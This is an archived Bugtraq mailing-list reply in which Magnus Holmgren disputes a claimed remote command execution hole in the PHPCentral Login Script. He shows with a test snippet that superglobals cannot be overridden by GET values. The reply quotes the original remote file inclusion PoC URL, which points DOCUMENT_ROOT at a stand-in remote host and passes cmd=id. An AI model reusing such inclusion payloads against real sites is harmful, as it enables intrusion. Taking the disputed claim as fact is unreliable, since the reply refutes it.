Bugtraq mailing list archives
Re: PHPCentral Login Script Remote Command Execution Vulnerability
From: Magnus Holmgren <holmgren () lysator liu se>
Date: Tue, 14 Aug 2007 10:16:18 +0200
On Sunday 12 August 2007 17:12, rizgar () linuxmail org wrote:
include.php ; Lines 4 ; include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php"); PoC : http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?& cmd=id
*Of course* this does not work. Setting register_globals to "On" causes the contents of the "superglobals" ($_SERVER, $_GET, $_COOKIES, etc.) to be registered in the global variable namespace. But the superglobals *themselves* are special. They shadow everything - you cannot define your own $_SERVER array, nor can it be overridden with HTTP GET or POST values. If that were possible, using the superglobals would be useless; all scripts would be vulnerable unless register_globals is off. PoC: echo '$_SERVER[DOCUMENT_ROOT] = ', $_SERVER[DOCUMENT_ROOT], "<br/>"; echo '$_GET["_SERVER"][DOCUMENT_ROOT] = ', $_GET["_SERVER"] [DOCUMENT_ROOT], "<br/>"; Outputs: $_SERVER[DOCUMENT_ROOT] = /home/www/docs $_GET["_SERVER"][DOCUMENT_ROOT] = /foo If the query string is _SERVER[DOCUMENT_ROOT]=/foo ========================================================================= Now, register_globals has defaulted to off ever since PHP 4.2.0. I think it would be fair to let PHP scripts rely on this, and not consider all scripts that don't initialize their variables as vulnerable unless they require register_globals to be on (this is not to say that it's not a good idea to initialize variables). And it would of course be nice if people posting to Bugtraq actually tested their PoCs first. Can't the moderator spot obvious cases like this, or are all vaguely relevant posts accepted, potentially for public ridicule? -- Magnus Holmgren holmgren () lysator liu se
Attachment:
_bin
Description:
Current thread:
- PHPCentral Login Script Remote Command Execution Vulnerability rizgar (Aug 13)
- Re: PHPCentral Login Script Remote Command Execution Vulnerability Magnus Holmgren (Aug 14)
- <Possible follow-ups>
- Re: PHPCentral Login Script Remote Command Execution Vulnerability Steven M. Christey (Aug 15)